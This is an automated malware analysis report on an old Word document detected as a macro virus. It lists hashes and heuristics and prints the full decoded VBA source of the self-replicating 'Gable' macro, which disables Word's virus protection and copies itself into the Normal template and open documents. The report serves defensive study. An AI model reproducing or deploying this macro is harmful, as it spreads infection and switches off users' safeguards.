Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ced45395d1c6d262…

MALICIOUS

Office (OLE)

29.5 KB Created: 1998-02-18 11:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 27e569b31c123186f53d987de50b5bc0 SHA-1: f5c0397bfb8048665a861c13c26abddf7ca6122f SHA-256: ced45395d1c6d26286cfb545aa4da0d4c79a3efce55f42180e9cd4d9b9349b59
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing a VBA macro named 'Gable' with an 'AutoOpen' subroutine. This macro attempts to copy itself to the Normal template and the active document, suggesting an intent to establish persistence or a backdoor. The 'FileSaveAs' subroutine is also present but truncated, indicating potential for further malicious actions. The presence of 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOOPEN' heuristics further supports the macro-based execution.

Heuristics 4

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3016 bytes
SHA-256: 6cc8230c533545d5774c89dda943a9a123bba4002bfc54647e069485ce5f2d2e
Detection
ClamAV: Doc.Trojan.Elbag-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Gable"

Sub AutoOpen()
On Error GoTo Gable

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    DocumentInstalled = False
    GlobalInstalled = False

    For G = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Gable" Then
            DocumentInstalled = True
        End If
    Next

    For B = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Gable" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If

    Application.DisplayAlerts = wdAlertsAll

Gable:
End Sub

Sub FileSaveAs()
On Error GoTo Gable

    Dialogs(wdDialogFileSaveAs).Show

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    DocumentInstalled = False
    GlobalInstalled = False

    For G = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Gable" Then
            DocumentInstalled = True
        End If
    Next

    For B = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Gable" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If

    Application.DisplayAlerts = wdAlertsAll

Gable:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.